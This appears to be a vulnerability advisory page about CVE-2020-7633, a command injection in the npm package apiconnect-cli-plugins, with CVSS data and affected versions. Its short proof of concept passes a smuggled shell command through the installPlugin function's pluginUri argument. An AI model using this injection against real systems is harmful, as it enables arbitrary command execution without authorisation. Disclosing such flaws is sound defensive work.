Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLWM5bTktNDhwdy02bXB2
apiconnect-cli-plugins vulnerable to OS Command Injection
apiconnect-cli-plugins through 6.0.1 is vulnerable to Command Injection. It allows execution of arbitrary commands via the pluginUri argument.
PoC
var root = require("apiconnect-cli-plugins");
var payload = "& touch Song &";
root.pluginLoader.installPlugin(payload, "");
The injection point is located in line 181 of file lib/plugin-loader.js, in the function installPlugin(pluginUri, registryUri).
JSON: https://advisories.ecosyste.ms/api/v1/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLWM5bTktNDhwdy02bXB2
Source: GitHub Advisory Database
Origin: Unspecified
Severity: Critical
Classification: General
Published: almost 3 years ago
Updated: 7 months ago
CVSS Score: 9.8
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Identifiers: GHSA-c9m9-48pw-6mpv, CVE-2020-7633
References:
- https://nvd.nist.gov/vuln/detail/CVE-2020-7633
- https://snyk.io/vuln/SNYK-JS-APICONNECTCLIPLUGINS-564427
- https://web.archive.org/web/20211209115530/https://openbase.com/js/apiconnect-cli-plugins
- https://github.com/advisories/GHSA-c9m9-48pw-6mpv
Affected Packages
npm:apiconnect-cli-plugins
Dependent packages: 23Dependent repositories: 1
Downloads: 177 last month
Affected Version Ranges: <= 6.0.1
No known fixed version
All affected versions: 1.0.1, 1.1.1, 2.0.0, 3.0.2, 3.1.0, 3.2.1, 3.3.1, 3.3.3, 3.3.4, 3.3.5, 3.3.6, 3.3.7, 3.3.9, 3.3.11, 3.3.12, 3.5.1, 5.0.1